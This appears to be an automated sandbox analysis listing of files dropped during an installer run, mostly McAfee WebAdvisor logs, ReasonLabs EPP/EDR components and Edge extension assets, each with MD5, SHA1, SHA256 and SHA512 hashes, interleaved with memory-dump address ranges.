C:\ProgramData\McAfee\WebAdvisor\LogicModule.dll\log_00200057003F001D0006.txt

MD5 9df8fc0874a01402e4dee37e29acbf8c
SHA1 c68deb7bb81a6b63105539a1580bb84a247bcc45
SHA256 f041d7f7715121ad34d610c02f17ff94ba607e73856e012e82d2df9c41a19b09
SHA512 214cbf09898d62a66059a09315834a476b7f45de5881aca2160f0ad8c5cdf410eb771784147c6488ab38840875dee05178d0a7bafe003c6fb2c7e47f4c54d580

memory/3136-32137-0x000002081C060000-0x000002081C09A000-memory.dmp

C:\ProgramData\McAfee\WebAdvisor\WATaskManager.dll\log_00200057003F001D0006.txt

MD5 8dca5883d7d822c302d387fa5ceac9c7
SHA1 7e5e4932ccfcb108029d3bd61772eb43e40c2ab5
SHA256 86311d0f95f350832694a8b9193bfb226f9af9c72c547dc24529b4d4538e3153
SHA512 4ee6c8787d799101e3bdb3ee4992d3cd9581b81ed3f59bc3b3faf2936868e125f34a612741dfc94a0671830137f6be29ba83399cdda0cb18317fcab868626c7a

C:\Users\Admin\AppData\Local\Temp\7zS0779229A\f2b877fd-56e5-4f8a-b2ee-f68d56f2606c\UnifiedStub-installer.exe\assembly\dl3\d3d3908f\aa9315fc_9ecada01\rsJSON.DLL

MD5 8740daedb5e9ab8a48389ee3088a9c16
SHA1 4d821d8523ee72ebe2cd3e74e3c0cdcea7038d92
SHA256 8c0123b38ef50dc9aa0cb7c56028ae9c031425ab812ee0b56ff396c35b7af95a
SHA512 e847f7bd7c02662196b1bdbbd1073e21bb185c4a2d19c351b643de80c3efca661c126f9ebd834373d1baf56e8a67d03ce9624132d35f4a8deeec00d4a3236b26

C:\Users\Admin\AppData\Local\Temp\nso2985.tmp\nsExec.dll

MD5 1f49d8af9be9e915d54b2441c4a79adf
SHA1 1ee4f809c693e31f34bc6d8153664a6dc2c3e499
SHA256 b22c8f676dec58be8d25fbad1a37835ffc4029f29aaf79f4dc0337ca73a38782
SHA512 c60827e322e3168a79795ffd4beb0b0039842128255100d6b005d261402d2ff570f3866f441f3d3c063097c71d44bc5ae80d177fa91ef4e46fc8c2d97de27aa4

memory/3136-32194-0x000002081C070000-0x000002081C0A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0779229A\f2b877fd-56e5-4f8a-b2ee-f68d56f2606c\UnifiedStub-installer.exe\assembly\dl3\bd4051c4\9bba15fc_9ecada01\rsLogger.DLL

MD5 683e19faf979c5ab2ae5919f0b3d1485
SHA1 8453dbc5029e96e4c42cf96b327aef987b15b9e8
SHA256 60834a138a215289237b1f99c05489e7bda8e8c4357ef8e96d7914ef270e5ca8
SHA512 0b3764b1fe3b7fe10f7b78243f5a91c8563816eb19dad8d06e31dcaf6898ecfce667fe2585cff4dacc2a2650cd09428b5e4f2ff58baa54855e9749dc4f5d44f4

C:\ProgramData\McAfee\WebAdvisor\WATaskManager.dll\log_00200057003F001D0006.txt

MD5 79b609fcf98f84e54308dc42e084886b
SHA1 c27823f84893db752b934951ee4e23beeaed029d
SHA256 df271d130dc19daf0e83033d7abfa96c9cd95836ae85203159aacc181855d3cd
SHA512 fa68d813064efa9538653cfcf4ecb7f58775c4bcd7e3e39127aa2cf81c423261b2ad2844eb101e02e96d344044cbfadf4002ce26bc85af67c860da708399307e

C:\Users\Admin\AppData\Local\Temp\7zS0779229A\f2b877fd-56e5-4f8a-b2ee-f68d56f2606c\UnifiedStub-installer.exe\assembly\dl3\5a786c2a\fa2611fc_9ecada01\rsAtom.DLL

MD5 f2c6d0704191203c591b7257beff2d57
SHA1 0f8e468f8c26b71c5162b33caa812fa48bac8dd6
SHA256 ea791c403f402fbe8763d1adbb3a317463562a42757aa74d96505f2a4997585e
SHA512 2637921c04e98b14085778f85716e92efb76f9a50a0a9c1793b0310043ad60413642199e49f72eccdb4d2cbdbaeccf87ed83bd49976e6409b10916ef0218be08

memory/3136-32266-0x000002081C100000-0x000002081C12A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0779229A\f2b877fd-56e5-4f8a-b2ee-f68d56f2606c\UnifiedStub-installer.exe\assembly\dl3\a72de454\ac0916fc_9ecada01\rsServiceController.DLL

MD5 3c11f1f4ab1b51e92af5210a25cb1a98
SHA1 f34e01f036d6279cb99ad36b7ad4f93875055ef1
SHA256 aadf52eefbc4330a9af62a2554635bc4f6d9503e0689ba86ee56c194b34d6382
SHA512 f872d8ec41c38e2c6527e4dd5285f7f877fe0714e94fde304f62b37b6f300d5bae38943df0c62dfa829886b0adbed01f6af14bdb8353ff6fdf73acedeb5ffcb4

memory/3136-32345-0x000002081C160000-0x000002081C18E000-memory.dmp

C:\Program Files\ReasonLabs\EPP\rsEngine.config

MD5 3149ca79d09c362307bed37960f0fd04
SHA1 f5f43f511ef581dc7b88ed194bb8e86e42f45bd3
SHA256 5481ccc72cad44173cdfbf746a701bb79e2b75927ef71aee1226e07e1265d31b
SHA512 d7c519a58bdefd24bcc26ec681b27a72a0aabbf4135d8e47a493abe1e4affd7cb5740b132d445aa9ecf66247de7406d5974557ae671d5977e40d877167b94a70

C:\Program Files\ReasonLabs\EPP\elam\rsElam.sys

MD5 8129c96d6ebdaebbe771ee034555bf8f
SHA1 9b41fb541a273086d3eef0ba4149f88022efbaff
SHA256 8bcc210669bc5931a3a69fc63ed288cb74013a92c84ca0aba89e3f4e56e3ae51
SHA512 ccd92987da4bda7a0f6386308611afb7951395158fc6d10a0596b0a0db4a61df202120460e2383d2d2f34cbb4d4e33e4f2e091a717d2fc1859ed7f58db3b7a18

memory/10424-32399-0x0000024695AE0000-0x0000024695B0E000-memory.dmp

memory/10424-32400-0x0000024695AE0000-0x0000024695B0E000-memory.dmp

memory/10424-32414-0x00000246B0010000-0x00000246B004C000-memory.dmp

memory/10424-32413-0x00000246AFFB0000-0x00000246AFFC2000-memory.dmp

memory/10840-32454-0x000001CADD060000-0x000001CADD3C6000-memory.dmp

memory/10840-32457-0x000001CAC4400000-0x000001CAC4422000-memory.dmp

memory/10840-32456-0x000001CAC43B0000-0x000001CAC43CA000-memory.dmp

memory/10840-32455-0x000001CADCEA0000-0x000001CADD01C000-memory.dmp

memory/11016-32462-0x000001FDFB920000-0x000001FDFB97C000-memory.dmp

memory/11016-32467-0x000001FDFDD90000-0x000001FDFDDEA000-memory.dmp

memory/11016-32468-0x000001FDFD670000-0x000001FDFD698000-memory.dmp

memory/11016-32470-0x000001FDFB920000-0x000001FDFB97C000-memory.dmp

C:\Program Files\ReasonLabs\EPP\rsEngineSvc.InstallLog

MD5 2afb72ff4eb694325bc55e2b0b2d5592
SHA1 ba1d4f70eaa44ce0e1856b9b43487279286f76c9
SHA256 41fb029d215775c361d561b02c482c485cc8fd220e6b62762bff15fd5f3fb91e
SHA512 5b5179b5495195e9988e0b48767e8781812292c207f8ae0551167976c630398433e8cc04fdbf0a57ef6a256e95db8715a0b89104d3ca343173812b233f078b6e

memory/11016-32480-0x000001FDFDF70000-0x000001FDFDFA2000-memory.dmp

memory/11016-32481-0x000001FDFE5D0000-0x000001FDFEBE8000-memory.dmp

memory/11016-32512-0x000001FDFEE50000-0x000001FDFF0AE000-memory.dmp

memory/9160-32544-0x0000014573490000-0x00000145734C0000-memory.dmp

memory/9160-32574-0x0000014573650000-0x00000145736B0000-memory.dmp

memory/9324-32712-0x0000020A23BB0000-0x0000020A23BD8000-memory.dmp

memory/9160-32714-0x00000145734C0000-0x00000145734E6000-memory.dmp

memory/9324-32716-0x0000020A3E290000-0x0000020A3E424000-memory.dmp

memory/9160-32720-0x00000145734F0000-0x0000014573518000-memory.dmp

memory/9160-32722-0x00000145736F0000-0x0000014573728000-memory.dmp

C:\Program Files\ReasonLabs\EDR\rsEDRSvc.InstallLog

MD5 1068bade1997666697dc1bd5b3481755
SHA1 4e530b9b09d01240d6800714640f45f8ec87a343
SHA256 3e9b9f8ed00c5197cb2c251eb0943013f58dca44e6219a1f9767d596b4aa2a51
SHA512 35dfd91771fd7930889ff466b45731404066c280c94494e1d51127cc60b342c638f333caa901429ad812e7ccee7530af15057e871ed5f1d3730454836337b329

memory/9160-32740-0x0000014573D20000-0x0000014573DA6000-memory.dmp

memory/9160-32739-0x0000014573730000-0x0000014573762000-memory.dmp

memory/9160-32742-0x00000145736B0000-0x00000145736D6000-memory.dmp

memory/9324-32726-0x0000020A23BB0000-0x0000020A23BD8000-memory.dmp

C:\Program Files\ReasonLabs\EDR\rsEDRSvc.InstallLog

MD5 6895e7ce1a11e92604b53b2f6503564e
SHA1 6a69c00679d2afdaf56fe50d50d6036ccb1e570f
SHA256 3c609771f2c736a7ce540fec633886378426f30f0ef4b51c20b57d46e201f177
SHA512 314d74972ef00635edfc82406b4514d7806e26cec36da9b617036df0e0c2448a9250b0239af33129e11a9a49455aab00407619ba56ea808b4539549fd86715a2

C:\ProgramData\McAfee\WebAdvisor\WATaskManager.dll\log_00200057003F001D0006.txt

MD5 75e3a359ce70de10054ebc1116c31c9f
SHA1 0a47718391122500653d1388cdb63ae8d558a8b7
SHA256 e859836a52130adca62ec834de4bdbcd51d893fdaac62eaf77fd577ca723e7d2
SHA512 ea8bb7b698243a64eb8909740c76eb206ee01b9f135e948d44ca9c917fe9f8f269b9c45f73b6bec18499e003f783bd7b71bd75cecee622b34c5311465a7a93bf

memory/9160-32808-0x0000014573CD0000-0x0000014573CFE000-memory.dmp

C:\Program Files\ReasonLabs\EDR\rsEDRSvc.InstallState

MD5 362ce475f5d1e84641bad999c16727a0
SHA1 6b613c73acb58d259c6379bd820cca6f785cc812
SHA256 1f78f1056761c6ebd8965ed2c06295bafa704b253aff56c492b93151ab642899
SHA512 7630e1629cf4abecd9d3ddea58227b232d5c775cb480967762a6a6466be872e1d57123b08a6179fe1cfbc09403117d0f81bc13724f259a1d25c1325f1eac645b

memory/9160-32811-0x0000014573E10000-0x0000014573E6E000-memory.dmp

memory/9160-32812-0x0000014574150000-0x00000145744B9000-memory.dmp

memory/9160-32816-0x0000014573DB0000-0x0000014573DFF000-memory.dmp

memory/9160-32817-0x0000014574750000-0x00000145749D6000-memory.dmp

memory/9900-32819-0x000001B922BF0000-0x000001B922C1E000-memory.dmp

memory/9900-32818-0x000001B93BAD0000-0x000001B93BDC0000-memory.dmp

memory/9160-32824-0x0000014574530000-0x0000014574596000-memory.dmp

memory/9160-32859-0x0000014572CF0000-0x0000014572D16000-memory.dmp

memory/9160-32858-0x00000145744C0000-0x00000145744FA000-memory.dmp

memory/9160-32871-0x0000014574500000-0x0000014574528000-memory.dmp

memory/9900-32872-0x000001B93B580000-0x000001B93B5B8000-memory.dmp

memory/9160-32883-0x00000145745E0000-0x0000014574614000-memory.dmp

memory/9160-32884-0x0000014574620000-0x000001457464A000-memory.dmp

C:\ProgramData\McAfee\WebAdvisor\updater.exe\log_00200057003F001D0006.txt

MD5 e85e62a342856e5b9fb57a528f1a2c7f
SHA1 e2bb1d327603dab19a75d31ef6b0b7af32cb67a8
SHA256 0bb2900337f311f2bf0b84e2b843c3fa5e691584150429d5ec379dfb5112fb2e
SHA512 100f1ee0f16eeea620935a233b606124161b989868b2f31749e2575506e4f41691ab71a24861ba1bce4992471518d78e497c7856e7653188617b4404af3e5f41

C:\ProgramData\ReasonLabs\EPP\SignaturesYF.dat.tmp

MD5 d13bddae18c3ee69e044ccf845e92116
SHA1 31129f1e8074a4259f38641d4f74f02ca980ec60
SHA256 1fac07374505f68520aa60852e3a3a656449fceacb7476df7414c73f394ad9e0
SHA512 70b2b752c2a61dcf52f0aadcd0ab0fdf4d06dc140aee6520a8c9d428379deb9fdcc101140c37029d2bac65a6cfcf5ed4216db45e4a162acbc7c8c8b666cd15dd

C:\ProgramData\ReasonLabs\EPP\SignaturesYS.dat.tmp

MD5 afb68bc4ae0b7040878a0b0c2a5177de
SHA1 ed4cac2f19b504a8fe27ad05805dd03aa552654e
SHA256 76e6f11076cc48eb453abbdbd616c1c46f280d2b4c521c906adf12bb3129067b
SHA512 ebc4c1f2da977d359791859495f9e37b05491e47d39e88a001cb6f2b7b1836b1470b6904c026142c2b1b4fe835560017641d6810a7e8a5c89766e55dd26e8c43

C:\ProgramData\ReasonLabs\EPP\SignaturesYFS.dat.tmp

MD5 10a8f2f82452e5aaf2484d7230ec5758
SHA1 1bf814ddace7c3915547c2085f14e361bbd91959
SHA256 97bffb5fc024494f5b4ad1e50fdb8fad37559c05e5d177107895de0a1741b50b
SHA512 6df8953699e8f5ccff900074fd302d5eb7cad9a55d257ac1ef2cb3b60ba1c54afe74aee62dc4b06b3f6edf14617c2d236749357c5e80c5a13d4f9afcb4efa097

C:\ProgramData\McAfee\WebAdvisor\ServiceHost.exe\log_00200057003F001D0006.txt

MD5 4ae1a1a82597adf2c85eca4d14300421
SHA1 27a54e424efaf333092903f51fff59259804888f
SHA256 91f6f039cceccc408eca0fbde62cc895bf8ae211752bcd675a754ce33f31bc2a
SHA512 919c47a245925c5c12bbfd6e650935a442692e2b3614787f4ede689b51e8103628cd61b8f2a0d7ecb7bef1e224c2347652bf19b03b7a7206de24053b7aade094

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00018e

MD5 89f0dfe11a5a72f9dd63e93e9369fd82
SHA1 1e66d0d7caed10313c29ad931ae1f0a668fd3879
SHA256 12b120e203118e94183e2811991a0dc682e7000b97d720c38aaa0196d3c7db7e
SHA512 aadcbe6cc0eed3ec196afd90956a421b3bb3f4cc56a6069b3f274ce1a3e87a7d8d17bbcf330cfc6ad9655f7432543b14b5a4d360e157a0873996d4df4ea712f4

C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 fc6b370d7b9693719924c25987442117
SHA1 89aec2053cf0d56ba9c5abf6627cdf9ada86e418
SHA256 848327146c10d24eab6f34b8c5cc7d983cefe5cbfd6596eaa1fe178548efbadf
SHA512 14088c7abbbf522014d2e6c8b98d764de87d0781b9999a01949e6a90d5d35d40932463f0e599d2d582acec64f1b2bcde9dcedcceed3f49ebb74ed6a92fb14679

C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP\DawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP\DawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP\DawnCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP\DawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Roaming\ReasonLabs\EPP\Partitions\plan-picker_5.31.8\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\bb5ad4b0-b931-4dca-89b5-ddf31af19299.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\fonts\segoe-ui.woff

MD5 9a2931180d6b1dc7b33052657eef554b
SHA1 77b8f3cb5410c779206782a310990c19af2b02ca
SHA256 f424915a692bc5a458d6e7d9c99e4fe0cf5cb8883bd3516b01d4fef5da8d3663
SHA512 e839eb6fa727c6a604da142e7c823c5d8b7d8e33b3d19937da7bc1948c32893b08f0ace35c020e391ab0a9694b479b28282024c3518dac995eb87fd7aa18c631

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\images\attention-icon.svg

MD5 5232d122e13560c86cf3ff0c84ecc3de
SHA1 7c0a78dd1c15e4b50943e1101f0caa8c0405f2c6
SHA256 616cff0cab3ee3e3b69aff4423a541daba199172d2eb2b0f5e7d83e1d6e13f99
SHA512 619222dcc939be36477504882d3a6689a58f9ede708c135fc621d1b8c9d3d9bb4bf6abbecfe7c13bbbbcd7ae2f0f150baa3ac5cd5358db0c057453042484d7a8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\fonts\segoe-ui-bold.woff

MD5 52382539737f4e9913e4bf6b9966bee3
SHA1 d58d3dc5ff86fe8ff594134df53ea9b8074f6bc6
SHA256 d711a54cb4822ccf7926b1a95b7a43107fcfe8ef99a817e6906a1063657c7b28
SHA512 55f1767cfb589eca775f2849b975d8311295951f8e457be58de34983531961ce4fada3a856daed8d7cd712bd8b5fad53ceecf438949deaafb7d5cb87114ecb4d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\fonts\noto-sans-semibold.ttf

MD5 dfad8b708bc7b6911ed49a6f35680b10
SHA1 44bd4f1602342642f6bbfc019cca65852d9f3ee0
SHA256 6a27c11bf011fbe565c4d5be9ab49d8535c7cfefeb3aa44dad5d1339f68aad1b
SHA512 0ee222bb6dd7882ec802fb21193ec49e814014f0ece7303c16c2fe24f94735f8d420fba59c9cd689748e89519880b723dfcbd4bbc635d2b89261cc336498e1a1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\fonts\noto-sans-regular.woff

MD5 0a66f097fb9215e828bc0ada73d19e45
SHA1 f962197011fa900ec29b4bd14f624a3309854626
SHA256 8e5f3060067847d71c398a897b8f8aecadbacadec3324b41d6eec5b3014fed89
SHA512 060d79916429b617f950a86ef6783198ceb844f26e65b7d26fd667a37c577c5913ba4ef183d2ca0e7f46b3d6e13c128a5bf8c4ae7e0f543c53c051bf13a92fd4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\fonts\noto-sans-medium.ttf

MD5 09dc02dbe8133545806d275a2fec2ca7
SHA1 f85d0a08f987df19288a61f18a22519ce0551c3e
SHA256 9d0511ca54de389e3ef4e8a8accdd94e6fdf73eb144f7bba2017e55924092822
SHA512 afd4ad23eaee89cdf729c8645f3d51ead449d8f9fa943a0158270857141d40c8619e3da98163b17770c09c0409536cd60c367736938645e119e60a11ea93dd53

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\fonts\noto-sans-bold.woff

MD5 a65fc7725f81daa832e2ac5d4820c2b1
SHA1 a5602a3cb911cdb6ed538c22f451763d884092f0
SHA256 5adee3972bb1a6f74b582f79a5d3b4735e665c00b2e49938a4fb68755e56d9df
SHA512 f8b07d9d46733c8820cf2466a14203710f10ceba789f80fb700b00ff950e5c1f30fb035939911e4d1a4e7ab92f37ce8f6fb47f5d9ab58f5eb5031804e4ad96a9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\icons\icon-upgrade.png

MD5 8f0dbfccb36007d663b552bb84db01d5
SHA1 709b15810f26fe075d1037b7d90e196f4471d574
SHA256 07b43077658e1bbc63ac5c7431fd1940f74e8231a532a055de9e2fa0ae79b0be
SHA512 064962f997821ab44b523dc6a7524b6ff21352d90fb9e13281a72ad4d09d3431173d96c71277c92cae023f91d435700169113f14171446d52e65e48b1a44f719

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\icons\icon-threat.png

MD5 02e2204d82355dd71f3e9a493087ab40
SHA1 dd3e5c7ba4d4f7d4784bb040718ced43b0ec6d57
SHA256 d6c4b23336f9539c8dfb12a44282aebe1c052a8bd2a808587c08b01809a755cf
SHA512 035814b7e5ecee257c897e4ce0aee38839760eba0b745df3258e2544429e3ba0a351eed5596ac6125b2c3ab13aafb8d3b97383c2fadb56ed315d7a0b7dd92a54

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\icons\icon-34.png

MD5 15b14e66c46e0a83449fea81f4d0e59c
SHA1 c3512dc47f25eb700e21a04f0925aa9d6996f08f
SHA256 10a9008f1b5e61a13f2fc225e9444f17a30036f76855826ff0f881de880db15e
SHA512 c0296a9252e9ea8336a28a73fdeb6d90a3fbd13cb5699f9b90e8b2e3858f041509e8886d056b402c5444e9b36a5950fdb8dc93dd46c15a79d84e1e579b5cd887

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\icons\icon-128.png

MD5 a3c4a97b3abf5c40532df4c73b6a0aed
SHA1 487bcc26a31f4545cada98e13532510784f3d9e4
SHA256 dc9ab4985526d23074e9cf2ee176e68dd7a5cd282c147df32733da083b7ce8a6
SHA512 71c82630413b7d9e8f2541bb036b1884c2e88ba5abee2e6abf79744951f1f2e65f7a3d82fb59c274ad7f02b3e49ee5fa2f20973410db3cc2ca92e6bb3dd42fbf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\images\logo_with_name.svg

MD5 7077be1629422619bbe5057dea2afcf6
SHA1 dccf730b9bd0ba9fb7c505f350aa2428457bc952
SHA256 0d28843ed45447345a2437b02ac99a6426de73143015d70bf2eb43ccd4fc75fa
SHA512 48da879c4223098c02814106279abcd6e5cd4a4379baf4cfeffa2fa7a961c4d8791ce10bb79a6643c1fc63d9b57e969f4fa2e5a2dc47e2ac60a1970b2f67f24f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\images\logo-white.svg

MD5 716872be17ae1eabffaafacfb8c0d518
SHA1 f2dd6d573d2fefe6ee189dafebc829098e6c973c
SHA256 824842f23358a42597e09fcc04efadd083e1bbfd6a75a863fabc413713013cf1
SHA512 a54c370a019f85be810337c5550392cd55c6c208b8ce71156c670cd6d5a62c6708f9c4a2d7370c76b0bff3c4dbdf2f99df3dca043084d3d1b552011f0688de40

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\images\logo-blue.svg

MD5 846cbae00ad12be63ce5319c6a260323
SHA1 aa840c643cc93e70f704b2d191d4686df04c11c9
SHA256 26abe92c6ad8587e0a373ed74aba3c33f82eb2c8efefd5fba08ce66014417fa9
SHA512 6f3688b8964a38ddd081dd9f431c413656b44de3d0cdbc14a536ce4a32a1ad5fcf7a4f3f5d75b2c986e8fa647fe75cdd32bbaef27bec39bd9c4d03b328a8eca3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\images\crown.svg

MD5 e2e93bf6f4365635d8d01a854caf31d5
SHA1 33502919a2f609b8ef7c8a18f7722d3ce337360b
SHA256 7bf49e91bda1b6dd05b94288fbd86391500557f272b4f8e0ad3a69549e7a6104
SHA512 5548d7fc0faff4ecae85888dbe938438390d478110c26db26e27f9764a3dfc3e5faf91789f84e9e76575b8f371a6cc0cd90feae6b8e3dbf317e59129b71cfeee

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\images\close-white.svg

MD5 1fe8bf19c860d2e13f6e9f1ebd2778cb
SHA1 3a47b23b93a3b89abaee6b57fdb597a742be1d23
SHA256 39c46e8e2da43cc6f31ec85120a8879bee0eefdde9b20ce92d1f5e8733b6eb40
SHA512 a3b13146700e148dd855df06045b374ad0f887c3e7452daf480ce913e47d199425741553d9c56e01721739829a1f741d27bdb564882499b908d55af55f57ea71

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\images\close-blue.svg

MD5 8d8bf8908be87508c56d626e0a776978
SHA1 3cad5703edacdadf1dc6fcb48fe921712b16fbf0
SHA256 9c5c3329378a3bfba29911b873f1d94239f6ac54dffe6bab113b3d51d8dc0ae0
SHA512 fc0b25c71d69c3721c104afd9ce6af91d89a92a37bf47f97e7df96187e45ed25ac08651e564a09281906e678f7df25af11aeff44b80a3fc17bf2c25c78e1236b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\images\check.svg

MD5 0b2e057ac7229a93f0c0815343c57ff9
SHA1 4c99a278bb5dd30203fb4f33f8d3dcfc5aae5a8e
SHA256 98ce9f3ebf75b2ca71e096bd01988540667d9e9636d5512fe17d099d9eba91ea
SHA512 daf1f0ac010b53f48a1769201bb48df13ef40531e55d3b0736925fdb81441af75f6d3f4e068090feaa6c8ece9f5168c8e44e1dc18c171aca6ef3596a596e067a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\assets\images\arrow.svg

MD5 8a4011cef8b4f6e1fe6dfd28c497ad69
SHA1 395ce130677ff0b579f1f3c7f8b45b8489490094
SHA256 31313b5ae51fffa0684dcd10537b9534413f105cfcfc3a8a39890bad5f3aa3f4
SHA512 e25314ee23995bc6d8cec92bd969b9b7e956d46e8bcf8d3ac209445c6f551d311468382f145f8017f6ab26d7cb8c9b6a0c4b3b41c5e7c3f03384116bf720ed85

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\_metadata\generated_indexed_rulesets\_ruleset1

MD5 d7a63ccfe52eeb58faa0f0aa441ab878
SHA1 050ad45533af7c85a5369c48e0ce49634ed62d65
SHA256 3a68db4a7ef75fa420da4db273d62feadf29e863800b584f97460cc6584d1f56
SHA512 583c464b95d9abe2ca9504f44bc3030c0698913470cf7a3890f1f9ae79b2477989b27b4f16cc9e61a991ca1af8b507eb9d4b812d766d6f1f0d2200a32d41c80e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\_metadata\verified_contents.json

MD5 1b01ffc2bafd0a464913805b97e1dd6a
SHA1 f64210c6b06215c5d288f26b3195c557951db428
SHA256 f14934357881f8c7340890752a4fdc0e5440c7ddeb29660ac642c9a972e5f551
SHA512 0d26c87a86371b26bdee126c4ea37fa437538391f88cd263c058e3aa64edaca91efaab01bf93f5c81d4d8df92e73469fffccf403dfb4d49267653e851fc6da20

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\Temp\scoped_dir5316_1655919283\CRX_INSTALL\rules.json

MD5 5736d36e31b7bc0d59788d30260281ea
SHA1 c2810c0335d1760d2ab337db349c362596df06be
SHA256 79ecc25acaf4d184958e339a9e48a1f0d187f82a676843dc6a40ff907e1853f3
SHA512 046686a280f60d50791ff8bd13989ba4bf058f402bc3d45c3688bc60e8ea91e6e44ec3ae8bf66f1e47b66b336ea8b0f70f20ff1279f6dfb377d662d633296c7e

